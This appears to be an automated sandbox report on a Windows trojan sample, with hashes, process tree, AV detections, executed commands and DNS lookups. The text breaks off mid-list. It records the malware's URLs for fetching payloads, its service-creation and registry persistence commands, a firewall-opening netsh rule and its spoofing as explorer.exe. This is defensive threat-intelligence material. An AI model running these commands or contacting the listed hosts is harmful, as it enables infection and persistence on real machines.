· 6 years ago · Jun 19, 2019, 06:34 PM
1
2[*] MalFamily: "Malicious"
3
4[*] MalScore: 10.0
5
6[*] File Name: "Exes_b492132bdd954cc96d1a52c8f33466eb.exe"
7[*] File Size: 294632
8[*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
9[*] SHA256: "55466706e69ae98b0480c6fded9a5c6ce1a7d0cd2f647c78c37b6bda9a71d3bf"
10[*] MD5: "b492132bdd954cc96d1a52c8f33466eb"
11[*] SHA1: "5d38c870cbbc7bf8e5d29d07fb77258c0db42bf3"
12[*] SHA512: "84a832d43357dd1e194f53cfedbcbf5e9dfb2f535a19c669540dd83458bac12e3126265fe8f4577a9fe901928f2945ae78de994813b88a3d31e56df5d47331d3"
13[*] CRC32: "B25D7831"
14[*] SSDEEP: "6144:GSM7aCPqsTeFAH3jjKeG28SnIkU1HpvN3:G9PqsT3XjjKeGvSIr1Hn3"
15
16[*] Process Execution: [
17 "Exes_b492132bdd954cc96d1a52c8f33466eb.exe",
18 "hkmoov.exe",
19 "reg.exe",
20 "4d7b8586.exe",
21 "2.exe",
22 "cmd.exe",
23 "cmd.exe",
24 "sc.exe",
25 "sc.exe",
26 "sc.exe",
27 "netsh.exe",
28 "9e022403.exe",
29 "services.exe",
30 "svchost.exe",
31 "mlxtyisf.exe"
32]
33
34[*] Signatures Detected: [
35 {
36 "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
37 "Details": [
38 {
39 "IP": "185.81.129.33:80"
40 },
41 {
42 "IP": "80.85.155.70:80"
43 }
44 ]
45 },
46 {
47 "Description": "Creates RWX memory",
48 "Details": []
49 },
50 {
51 "Description": "Reads data out of its own binary image",
52 "Details": [
53 {
54 "self_read": "process: Exes_b492132bdd954cc96d1a52c8f33466eb.exe, pid: 1392, offset: 0x00000000, length: 0x00033000"
55 },
56 {
57 "self_read": "process: 2.exe, pid: 2856, offset: 0x00000000, length: 0x00000040"
58 },
59 {
60 "self_read": "process: 2.exe, pid: 2856, offset: 0x00000000, length: 0x00018800"
61 },
62 {
63 "self_read": "process: 2.exe, pid: 2856, offset: 0x00000080, length: 0x000001c0"
64 }
65 ]
66 },
67 {
68 "Description": "A process created a hidden window",
69 "Details": [
70 {
71 "Process": "2.exe -> cmd"
72 },
73 {
74 "Process": "2.exe -> cmd"
75 },
76 {
77 "Process": "2.exe -> sc"
78 },
79 {
80 "Process": "2.exe -> sc"
81 },
82 {
83 "Process": "2.exe -> sc"
84 },
85 {
86 "Process": "2.exe -> netsh"
87 }
88 ]
89 },
90 {
91 "Description": "Drops a binary and executes it",
92 "Details": [
93 {
94 "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\4d7b8586.exe"
95 },
96 {
97 "binary": "C:\\programdata\\cf4620d67a\\hkmoov.exe"
98 },
99 {
100 "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\2.exe"
101 },
102 {
103 "binary": "C:\\Windows\\SysWOW64\\gzsiyoiy\\mlxtyisf.exe"
104 },
105 {
106 "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\9e022403.exe"
107 },
108 {
109 "binary": "C:\\Users\\user\\AppData\\Roaming\\Intel Rapid\\IntelRapid.exe"
110 }
111 ]
112 },
113 {
114 "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
115 "Details": [
116 {
117 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
118 },
119 {
120 "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
121 },
122 {
123 "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
124 },
125 {
126 "suspicious_request": "http://vt-ne.com/upload/index.php"
127 },
128 {
129 "suspicious_request": "http://a-7763.com/uploads/4d7b8586.exe"
130 },
131 {
132 "suspicious_request": "http://80.85.155.70/2.php"
133 },
134 {
135 "suspicious_request": "http://a-7763.com/uploads/9e022403.exe"
136 },
137 {
138 "suspicious_request": "http://www.msftncsi.com/ncsi.txt"
139 },
140 {
141 "suspicious_request": "http://www.google.com/"
142 },
143 {
144 "suspicious_request": "http://www.trackip.net/ip"
145 },
146 {
147 "suspicious_request": "http://api.ipify.org/"
148 }
149 ]
150 },
151 {
152 "Description": "Performs some HTTP requests",
153 "Details": [
154 {
155 "url": "http://vt-ne.com/upload/index.php"
156 },
157 {
158 "url": "http://a-7763.com/uploads/4d7b8586.exe"
159 },
160 {
161 "url": "http://80.85.155.70/2.php"
162 },
163 {
164 "url": "http://a-7763.com/uploads/9e022403.exe"
165 },
166 {
167 "url": "http://www.msftncsi.com/ncsi.txt"
168 },
169 {
170 "url": "http://www.google.com/"
171 },
172 {
173 "url": "http://www.trackip.net/ip"
174 },
175 {
176 "url": "http://api.ipify.org/"
177 }
178 ]
179 },
180 {
181 "Description": "Queries information on disks, possibly for anti-virtualization",
182 "Details": []
183 },
184 {
185 "Description": "Attempts to restart the guest VM",
186 "Details": []
187 },
188 {
189 "Description": "Enumerates services, possibly for anti-virtualization",
190 "Details": []
191 },
192 {
193 "Description": "Executed a process and injected code into it, probably while unpacking",
194 "Details": [
195 {
196 "Injection": "mlxtyisf.exe(2656) -> None(1028)"
197 }
198 ]
199 },
200 {
201 "Description": "Installs itself for autorun at Windows startup",
202 "Details": [
203 {
204 "service name": "gzsiyoiy"
205 },
206 {
207 "service path": "C:\\Windows\\SysWOW64\\gzsiyoiy\\mlxtyisf.exe /d\"C:\\Users\\user\\AppData\\Local\\Temp\\2.exe\""
208 }
209 ]
210 },
211 {
212 "Description": "Spoofs its process name and/or associated pathname to appear as a legitimate process",
213 "Details": [
214 {
215 "modified_name": "explorer.exe",
216 "modified_path": "C:\\Windows\\explorer.exe",
217 "original_name": "4d7b8586.exe",
218 "original_path": "C:\\Users\\user\\AppData\\Local\\Temp\\4d7b8586.exe"
219 }
220 ]
221 },
222 {
223 "Description": "Attempts to identify installed AV products by installation directory",
224 "Details": [
225 {
226 "file": "C:\\ProgramData\\AVAST Software"
227 },
228 {
229 "file": "C:\\ProgramData\\Avira"
230 },
231 {
232 "file": "C:\\ProgramData\\Kaspersky Lab"
233 },
234 {
235 "file": "C:\\ProgramData\\ESET"
236 },
237 {
238 "file": "C:\\ProgramData\\Panda Security"
239 },
240 {
241 "file": "C:\\ProgramData\\Bitdefender"
242 },
243 {
244 "file": "C:\\ProgramData\\AVG"
245 },
246 {
247 "file": "C:\\ProgramData\\Doctor Web"
248 }
249 ]
250 },
251 {
252 "Description": "File has been identified by 16 Antiviruses on VirusTotal as malicious",
253 "Details": [
254 {
255 "FireEye": "Generic.mg.b492132bdd954cc9"
256 },
257 {
258 "McAfee": "Trojan-FQZA!B492132BDD95"
259 },
260 {
261 "Symantec": "ML.Attribute.HighConfidence"
262 },
263 {
264 "APEX": "Malicious"
265 },
266 {
267 "ClamAV": "Win.Malware.Generickdz-6907156-0"
268 },
269 {
270 "Kaspersky": "UDS:DangerousObject.Multi.Generic"
271 },
272 {
273 "Trapmine": "malicious.moderate.ml.score"
274 },
275 {
276 "SentinelOne": "DFI - Suspicious PE"
277 },
278 {
279 "Microsoft": "Trojan:Win32/Gandcrab.AF"
280 },
281 {
282 "Endgame": "malicious (high confidence)"
283 },
284 {
285 "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
286 },
287 {
288 "Acronis": "suspicious"
289 },
290 {
291 "Cylance": "Unsafe"
292 },
293 {
294 "Rising": "Malware.Heuristic.MLite(80%) (AI-LITE:65KWFtAVKhavWd/CpO8uFg)"
295 },
296 {
297 "CrowdStrike": "win/malicious_confidence_60% (D)"
298 },
299 {
300 "Qihoo-360": "HEUR/QVM10.1.F8B7.Malware.Gen"
301 }
302 ]
303 },
304 {
305 "Description": "Creates a copy of itself",
306 "Details": [
307 {
308 "copy": "C:\\programdata\\cf4620d67a\\hkmoov.exe"
309 }
310 ]
311 }
312]
313
314[*] Started Service: [
315 "gzsiyoiy"
316]
317
318[*] Executed Commands: [
319 "c:\\programdata\\cf4620d67a\\hkmoov.exe",
320 "REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\cf4620d67a",
321 "C:\\Users\\user\\AppData\\Local\\Temp\\4d7b8586.exe",
322 "C:\\Users\\user\\AppData\\Local\\Temp\\2.exe",
323 "C:\\Users\\user\\AppData\\Local\\Temp\\9e022403.exe",
324 "\"C:\\Windows\\System32\\cmd.exe\" /C mkdir C:\\Windows\\SysWOW64\\gzsiyoiy\\",
325 "cmd /C mkdir C:\\Windows\\SysWOW64\\gzsiyoiy\\",
326 "\"C:\\Windows\\System32\\cmd.exe\" /C move /Y \"C:\\Users\\user\\AppData\\Local\\Temp\\mlxtyisf.exe\" C:\\Windows\\SysWOW64\\gzsiyoiy\\",
327 "cmd /C move /Y \"C:\\Users\\user\\AppData\\Local\\Temp\\mlxtyisf.exe\" C:\\Windows\\SysWOW64\\gzsiyoiy\\",
328 "\"C:\\Windows\\System32\\sc.exe\" create gzsiyoiy binPath= \"C:\\Windows\\SysWOW64\\gzsiyoiy\\mlxtyisf.exe /d\\\"C:\\Users\\user\\AppData\\Local\\Temp\\2.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"",
329 "sc create gzsiyoiy binPath= \"C:\\Windows\\SysWOW64\\gzsiyoiy\\mlxtyisf.exe /d\\\"C:\\Users\\user\\AppData\\Local\\Temp\\2.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"",
330 "\"C:\\Windows\\System32\\sc.exe\" description gzsiyoiy \"wifi internet conection\"",
331 "sc description gzsiyoiy \"wifi internet conection\"",
332 "\"C:\\Windows\\System32\\sc.exe\" start gzsiyoiy",
333 "sc start gzsiyoiy",
334 "\"C:\\Windows\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"C:\\Windows\\SysWOW64\\svchost.exe\" enable=yes>nul",
335 "netsh advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"C:\\Windows\\SysWOW64\\svchost.exe\" enable=yes>nul",
336 "C:\\Users\\user\\AppData\\Roaming\\Intel Rapid\\IntelRapid.exe",
337 "C:\\Windows\\SysWOW64\\gzsiyoiy\\mlxtyisf.exe /d\"C:\\Users\\user\\AppData\\Local\\Temp\\2.exe\"",
338 "svchost.exe"
339]
340
341[*] Mutexes: [
342 "HbyzzAwhcXhduw",
343 "Local\\ZoneAttributeCacheCounterMutex",
344 "Local\\ZonesCacheCounterMutex",
345 "Local\\ZonesLockedCacheCounterMutex"
346]
347
348[*] Modified Files: [
349 "C:\\ProgramData\\0",
350 "C:\\programdata\\cf4620d67a\\hkmoov.exe",
351 "C:\\programdata\\cf4620d67a\\hkmoov.exe:Zone.Identifier",
352 "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Q8H2MS75\\4d7b8586[1].exe",
353 "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\8BGZLQBV\\calc[1].exe",
354 "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\9e022403[1].exe",
355 "\\??\\PHYSICALDRIVE0",
356 "\\??\\pipe\\ngzpfvpf",
357 "C:\\Users\\user\\AppData\\Local\\Temp\\mlxtyisf.exe",
358 "C:\\Windows\\SysWOW64\\gzsiyoiy\\mlxtyisf.exe",
359 "C:\\Users\\user\\AppData\\Roaming\\Intel Rapid\\IntelRapid.exe",
360 "\\??\\PIPE\\srvsvc",
361 "C:\\ProgramData\\cf4620d67a\\IntelRapid.lnk",
362 "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
363 "C:\\Windows\\sysnative\\Tasks\\Intel Rapid"
364]
365
366[*] Deleted Files: [
367 "C:\\Users\\user\\AppData\\Local\\Temp\\mlxtyisf.exe",
368 "C:\\Windows\\Tasks\\Intel Rapid.job"
369]
370
371[*] Modified Registry Keys: [
372 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup",
373 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
374 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
375 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{D49F2109-98AC-46C0-8C98-1DF3806E924A}\\Path",
376 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{D49F2109-98AC-46C0-8C98-1DF3806E924A}\\Hash",
377 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Intel Rapid\\Id",
378 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Intel Rapid\\Index",
379 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{D49F2109-98AC-46C0-8C98-1DF3806E924A}\\Triggers",
380 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{D49F2109-98AC-46C0-8C98-1DF3806E924A}\\DynamicInfo"
381]
382
383[*] Deleted Registry Keys: [
384 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
385 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
386 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
387 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
388 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\Intel Rapid.job",
389 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\Intel Rapid.job.fp"
390]
391
392[*] DNS Communications: [
393 {
394 "type": "A",
395 "request": "vt-ne.com",
396 "answers": [
397 {
398 "data": "47.254.157.47",
399 "type": "A"
400 }
401 ]
402 },
403 {
404 "type": "A",
405 "request": "a-7763.com",
406 "answers": [
407 {
408 "data": "185.81.129.33",
409 "type": "A"
410 }
411 ]
412 },
413 {
414 "type": "PTR",
415 "request": "13.67.98.172.in-addr.arpa",
416 "answers": []
417 },
418 {
419 "type": "MX",
420 "request": "apasesores.com",
421 "answers": []
422 },
423 {
424 "type": "MX",
425 "request": "y7mail.com",
426 "answers": [
427 {
428 "data": "mta5.am0.yahoodns.net",
429 "type": "MX"
430 },
431 {
432 "data": "mta7.am0.yahoodns.net",
433 "type": "MX"
434 },
435 {
436 "data": "mta6.am0.yahoodns.net",
437 "type": "MX"
438 }
439 ]
440 },
441 {
442 "type": "A",
443 "request": "mta5.am0.yahoodns.net",
444 "answers": [
445 {
446 "data": "67.195.228.94",
447 "type": "A"
448 },
449 {
450 "data": "74.6.137.64",
451 "type": "A"
452 },
453 {
454 "data": "74.6.137.65",
455 "type": "A"
456 },
457 {
458 "data": "98.137.159.27",
459 "type": "A"
460 },
461 {
462 "data": "98.137.159.26",
463 "type": "A"
464 },
465 {
466 "data": "98.137.159.24",
467 "type": "A"
468 },
469 {
470 "data": "74.6.137.63",
471 "type": "A"
472 },
473 {
474 "data": "67.195.228.110",
475 "type": "A"
476 }
477 ]
478 },
479 {
480 "type": "MX",
481 "request": "aol.com",
482 "answers": [
483 {
484 "data": "mx-aol.mail.gm0.yahoodns.net",
485 "type": "MX"
486 }
487 ]
488 },
489 {
490 "type": "A",
491 "request": "mx-aol.mail.gm0.yahoodns.net",
492 "answers": [
493 {
494 "data": "67.195.228.87",
495 "type": "A"
496 },
497 {
498 "data": "98.137.157.43",
499 "type": "A"
500 },
501 {
502 "data": "98.136.101.116",
503 "type": "A"
504 },
505 {
506 "data": "98.136.96.73",
507 "type": "A"
508 },
509 {
510 "data": "66.218.85.151",
511 "type": "A"
512 },
513 {
514 "data": "74.6.141.40",
515 "type": "A"
516 }
517 ]
518 },
519 {
520 "type": "MX",
521 "request": "cableone.net",
522 "answers": [
523 {
524 "data": "mx.cableone.net",
525 "type": "MX"
526 }
527 ]
528 },
529 {
530 "type": "A",
531 "request": "mx.cableone.net",
532 "answers": [
533 {
534 "data": "69.168.106.65",
535 "type": "A"
536 }
537 ]
538 },
539 {
540 "type": "MX",
541 "request": "besuttisenin.it",
542 "answers": [
543 {
544 "data": "",
545 "type": "NXDOMAIN"
546 }
547 ]
548 },
549 {
550 "type": "MX",
551 "request": "wailic.com",
552 "answers": [
553 {
554 "data": "alt2.aspmx.l.google.com",
555 "type": "MX"
556 },
557 {
558 "data": "alt1.aspmx.l.google.com",
559 "type": "MX"
560 },
561 {
562 "data": "aspmx4.googlemail.com",
563 "type": "MX"
564 },
565 {
566 "data": "aspmx3.googlemail.com",
567 "type": "MX"
568 },
569 {
570 "data": "aspmx5.googlemail.com",
571 "type": "MX"
572 },
573 {
574 "data": "aspmx.l.google.com",
575 "type": "MX"
576 },
577 {
578 "data": "aspmx2.googlemail.com",
579 "type": "MX"
580 }
581 ]
582 },
583 {
584 "type": "MX",
585 "request": "tiscalinet.it",
586 "answers": [
587 {
588 "data": "etb-1.mail.tiscali.it",
589 "type": "MX"
590 },
591 {
592 "data": "imp-5.mail.tiscali.it",
593 "type": "MX"
594 },
595 {
596 "data": "etb-3.mail.tiscali.it",
597 "type": "MX"
598 },
599 {
600 "data": "etb-2.mail.tiscali.it",
601 "type": "MX"
602 },
603 {
604 "data": "etb-4.mail.tiscali.it",
605 "type": "MX"
606 }
607 ]
608 },
609 {
610 "type": "A",
611 "request": "etb-4.mail.tiscali.it",
612 "answers": [
613 {
614 "data": "213.205.33.63",
615 "type": "A"
616 },
617 {
618 "data": "213.205.33.64",
619 "type": "A"
620 },
621 {
622 "data": "213.205.33.61",
623 "type": "A"
624 },
625 {
626 "data": "213.205.33.62",
627 "type": "A"
628 }
629 ]
630 },
631 {
632 "type": "MX",
633 "request": "cs.com",
634 "answers": [
635 {
636 "data": "mx-aol.mail.gm0.yahoodns.net",
637 "type": "MX"
638 }
639 ]
640 },
641 {
642 "type": "MX",
643 "request": "crosslake.net",
644 "answers": [
645 {
646 "data": "filter.crosslake.net",
647 "type": "MX"
648 }
649 ]
650 },
651 {
652 "type": "A",
653 "request": "filter.crosslake.net",
654 "answers": [
655 {
656 "data": "74.51.186.34",
657 "type": "A"
658 }
659 ]
660 },
661 {
662 "type": "MX",
663 "request": "comcast.net",
664 "answers": [
665 {
666 "data": "mx2.comcast.net",
667 "type": "MX"
668 },
669 {
670 "data": "mx1.comcast.net",
671 "type": "MX"
672 }
673 ]
674 },
675 {
676 "type": "A",
677 "request": "mx2.comcast.net",
678 "answers": [
679 {
680 "data": "68.87.20.5",
681 "type": "A"
682 }
683 ]
684 },
685 {
686 "type": "MX",
687 "request": "argoss.org",
688 "answers": [
689 {
690 "data": "",
691 "type": "NXDOMAIN"
692 }
693 ]
694 },
695 {
696 "type": "MX",
697 "request": "tiscali.co.uk",
698 "answers": [
699 {
700 "data": "mx.tiscali.co.uk",
701 "type": "MX"
702 }
703 ]
704 },
705 {
706 "type": "A",
707 "request": "mx.tiscali.co.uk",
708 "answers": [
709 {
710 "data": "62.24.139.42",
711 "type": "A"
712 }
713 ]
714 },
715 {
716 "type": "MX",
717 "request": "global-forwarding.co.uk",
718 "answers": [
719 {
720 "data": "",
721 "type": "NXDOMAIN"
722 }
723 ]
724 },
725 {
726 "type": "MX",
727 "request": "cemcrete.co.za",
728 "answers": [
729 {
730 "data": "cemcrete-co-za.mail.protection.outlook.com",
731 "type": "MX"
732 }
733 ]
734 },
735 {
736 "type": "A",
737 "request": "cemcrete-co-za.mail.protection.outlook.com",
738 "answers": [
739 {
740 "data": "104.47.5.36",
741 "type": "A"
742 },
743 {
744 "data": "104.47.4.36",
745 "type": "A"
746 }
747 ]
748 },
749 {
750 "type": "MX",
751 "request": "bativert-dz.com",
752 "answers": [
753 {
754 "data": "mail.bativert-dz.com",
755 "type": "MX"
756 }
757 ]
758 },
759 {
760 "type": "A",
761 "request": "mail.bativert-dz.com",
762 "answers": [
763 {
764 "data": "192.254.232.36",
765 "type": "A"
766 }
767 ]
768 },
769 {
770 "type": "A",
771 "request": "www.netflix.com",
772 "answers": [
773 {
774 "data": "34.238.74.93",
775 "type": "A"
776 },
777 {
778 "data": "www.us-east-1.prodaa.netflix.com",
779 "type": "CNAME"
780 },
781 {
782 "data": "52.20.168.249",
783 "type": "A"
784 },
785 {
786 "data": "34.194.103.209",
787 "type": "A"
788 },
789 {
790 "data": "34.234.59.120",
791 "type": "A"
792 },
793 {
794 "data": "54.173.169.115",
795 "type": "A"
796 },
797 {
798 "data": "34.232.235.235",
799 "type": "A"
800 },
801 {
802 "data": "54.164.254.216",
803 "type": "A"
804 },
805 {
806 "data": "54.165.246.104",
807 "type": "A"
808 },
809 {
810 "data": "www.geo.netflix.com",
811 "type": "CNAME"
812 },
813 {
814 "data": "34.230.208.35",
815 "type": "A"
816 },
817 {
818 "data": "54.164.56.104",
819 "type": "A"
820 },
821 {
822 "data": "52.73.237.45",
823 "type": "A"
824 },
825 {
826 "data": "54.89.22.165",
827 "type": "A"
828 },
829 {
830 "data": "34.236.111.10",
831 "type": "A"
832 },
833 {
834 "data": "52.6.51.102",
835 "type": "A"
836 },
837 {
838 "data": "34.237.9.27",
839 "type": "A"
840 },
841 {
842 "data": "52.207.12.211",
843 "type": "A"
844 }
845 ]
846 },
847 {
848 "type": "MX",
849 "request": "hackney.gov.uk",
850 "answers": [
851 {
852 "data": "alt4.aspmx.l.google.com",
853 "type": "MX"
854 },
855 {
856 "data": "alt3.aspmx.l.google.com",
857 "type": "MX"
858 },
859 {
860 "data": "alt2.aspmx.l.google.com",
861 "type": "MX"
862 },
863 {
864 "data": "alt1.aspmx.l.google.com",
865 "type": "MX"
866 },
867 {
868 "data": "aspmx.l.google.com",
869 "type": "MX"
870 }
871 ]
872 },
873 {
874 "type": "MX",
875 "request": "centraloregonlimos.com",
876 "answers": [
877 {
878 "data": "centraloregonlimos.com",
879 "type": "MX"
880 }
881 ]
882 },
883 {
884 "type": "A",
885 "request": "centraloregonlimos.com",
886 "answers": [
887 {
888 "data": "142.4.20.117",
889 "type": "A"
890 }
891 ]
892 },
893 {
894 "type": "MX",
895 "request": "epssworks.com",
896 "answers": [
897 {
898 "data": "d120086a.ess.barracudanetworks.com",
899 "type": "MX"
900 },
901 {
902 "data": "d120086b.ess.barracudanetworks.com",
903 "type": "MX"
904 }
905 ]
906 },
907 {
908 "type": "A",
909 "request": "d120086a.ess.barracudanetworks.com",
910 "answers": [
911 {
912 "data": "209.222.82.144",
913 "type": "A"
914 },
915 {
916 "data": "209.222.82.126",
917 "type": "A"
918 },
919 {
920 "data": "209.222.82.138",
921 "type": "A"
922 },
923 {
924 "data": "209.222.82.141",
925 "type": "A"
926 },
927 {
928 "data": "209.222.82.135",
929 "type": "A"
930 },
931 {
932 "data": "209.222.82.156",
933 "type": "A"
934 },
935 {
936 "data": "209.222.82.150",
937 "type": "A"
938 },
939 {
940 "data": "209.222.82.147",
941 "type": "A"
942 },
943 {
944 "data": "209.222.82.162",
945 "type": "A"
946 },
947 {
948 "data": "209.222.82.165",
949 "type": "A"
950 },
951 {
952 "data": "209.222.82.132",
953 "type": "A"
954 },
955 {
956 "data": "209.222.82.153",
957 "type": "A"
958 },
959 {
960 "data": "209.222.82.159",
961 "type": "A"
962 },
963 {
964 "data": "209.222.82.129",
965 "type": "A"
966 }
967 ]
968 },
969 {
970 "type": "MX",
971 "request": "mixmail.com",
972 "answers": [
973 {
974 "data": "ing.wanadoo.es",
975 "type": "MX"
976 }
977 ]
978 },
979 {
980 "type": "A",
981 "request": "ing.wanadoo.es",
982 "answers": [
983 {
984 "data": "62.36.20.73",
985 "type": "A"
986 }
987 ]
988 },
989 {
990 "type": "MX",
991 "request": "einstein.edu",
992 "answers": [
993 {
994 "data": "mxa-00337c01.gslb.pphosted.com",
995 "type": "MX"
996 },
997 {
998 "data": "mxb-00337c01.gslb.pphosted.com",
999 "type": "MX"
1000 }
1001 ]
1002 },
1003 {
1004 "type": "A",
1005 "request": "mxa-00337c01.gslb.pphosted.com",
1006 "answers": [
1007 {
1008 "data": "148.163.145.199",
1009 "type": "A"
1010 }
1011 ]
1012 },
1013 {
1014 "type": "MX",
1015 "request": "ckdgalbraith.co.uk",
1016 "answers": [
1017 {
1018 "data": "cluster8a.eu.messagelabs.com",
1019 "type": "MX"
1020 },
1021 {
1022 "data": "cluster8.eu.messagelabs.com",
1023 "type": "MX"
1024 }
1025 ]
1026 },
1027 {
1028 "type": "A",
1029 "request": "cluster8.eu.messagelabs.com",
1030 "answers": [
1031 {
1032 "data": "85.158.142.104",
1033 "type": "A"
1034 },
1035 {
1036 "data": "85.158.142.194",
1037 "type": "A"
1038 },
1039 {
1040 "data": "46.226.53.50",
1041 "type": "A"
1042 },
1043 {
1044 "data": "46.226.52.200",
1045 "type": "A"
1046 },
1047 {
1048 "data": "46.226.53.56",
1049 "type": "A"
1050 },
1051 {
1052 "data": "85.158.142.201",
1053 "type": "A"
1054 },
1055 {
1056 "data": "85.158.142.98",
1057 "type": "A"
1058 },
1059 {
1060 "data": "46.226.52.104",
1061 "type": "A"
1062 },
1063 {
1064 "data": "46.226.52.98",
1065 "type": "A"
1066 },
1067 {
1068 "data": "46.226.52.194",
1069 "type": "A"
1070 }
1071 ]
1072 },
1073 {
1074 "type": "MX",
1075 "request": "chrzan.com",
1076 "answers": [
1077 {
1078 "data": "chrzan.com",
1079 "type": "MX"
1080 }
1081 ]
1082 },
1083 {
1084 "type": "A",
1085 "request": "chrzan.com",
1086 "answers": [
1087 {
1088 "data": "198.46.81.192",
1089 "type": "A"
1090 }
1091 ]
1092 },
1093 {
1094 "type": "MX",
1095 "request": "caninter.ca",
1096 "answers": [
1097 {
1098 "data": "caninter.ca",
1099 "type": "MX"
1100 }
1101 ]
1102 },
1103 {
1104 "type": "A",
1105 "request": "caninter.ca",
1106 "answers": [
1107 {
1108 "data": "192.185.138.139",
1109 "type": "A"
1110 }
1111 ]
1112 },
1113 {
1114 "type": "MX",
1115 "request": "hotmail.com",
1116 "answers": [
1117 {
1118 "data": "hotmail-com.olc.protection.outlook.com",
1119 "type": "MX"
1120 }
1121 ]
1122 },
1123 {
1124 "type": "A",
1125 "request": "hotmail-com.olc.protection.outlook.com",
1126 "answers": [
1127 {
1128 "data": "104.47.8.33",
1129 "type": "A"
1130 },
1131 {
1132 "data": "104.47.9.33",
1133 "type": "A"
1134 },
1135 {
1136 "data": "104.47.126.33",
1137 "type": "A"
1138 },
1139 {
1140 "data": "104.47.124.33",
1141 "type": "A"
1142 }
1143 ]
1144 },
1145 {
1146 "type": "MX",
1147 "request": "libero.it",
1148 "answers": [
1149 {
1150 "data": "smtp-in.libero.it",
1151 "type": "MX"
1152 }
1153 ]
1154 },
1155 {
1156 "type": "A",
1157 "request": "smtp-in.libero.it",
1158 "answers": [
1159 {
1160 "data": "213.209.1.129",
1161 "type": "A"
1162 }
1163 ]
1164 },
1165 {
1166 "type": "MX",
1167 "request": "go-for-it.fsnet.co.uk",
1168 "answers": [
1169 {
1170 "data": "frontend.winston.odinfra.com",
1171 "type": "CNAME"
1172 },
1173 {
1174 "data": "mar202015-webserve-g17njniegl34-403973296.eu-west-1.elb.amazonaws.com",
1175 "type": "CNAME"
1176 }
1177 ]
1178 },
1179 {
1180 "type": "MX",
1181 "request": "nationwide.co.uk",
1182 "answers": [
1183 {
1184 "data": "cluster3a.eu.messagelabs.com",
1185 "type": "MX"
1186 },
1187 {
1188 "data": "cluster3.eu.messagelabs.com",
1189 "type": "MX"
1190 }
1191 ]
1192 },
1193 {
1194 "type": "A",
1195 "request": "cluster3.eu.messagelabs.com",
1196 "answers": [
1197 {
1198 "data": "85.158.142.198",
1199 "type": "A"
1200 },
1201 {
1202 "data": "85.158.142.102",
1203 "type": "A"
1204 },
1205 {
1206 "data": "46.226.53.51",
1207 "type": "A"
1208 },
1209 {
1210 "data": "46.226.52.198",
1211 "type": "A"
1212 },
1213 {
1214 "data": "85.158.142.99",
1215 "type": "A"
1216 },
1217 {
1218 "data": "46.226.53.54",
1219 "type": "A"
1220 },
1221 {
1222 "data": "46.226.52.102",
1223 "type": "A"
1224 },
1225 {
1226 "data": "46.226.52.99",
1227 "type": "A"
1228 },
1229 {
1230 "data": "46.226.52.195",
1231 "type": "A"
1232 },
1233 {
1234 "data": "85.158.142.192",
1235 "type": "A"
1236 }
1237 ]
1238 },
1239 {
1240 "type": "MX",
1241 "request": "clovelly.org.au",
1242 "answers": [
1243 {
1244 "data": "mail.clovelly.org.au",
1245 "type": "MX"
1246 }
1247 ]
1248 },
1249 {
1250 "type": "A",
1251 "request": "mail.clovelly.org.au",
1252 "answers": [
1253 {
1254 "data": "69.89.31.205",
1255 "type": "A"
1256 }
1257 ]
1258 },
1259 {
1260 "type": "MX",
1261 "request": "tmmaestro.com",
1262 "answers": [
1263 {
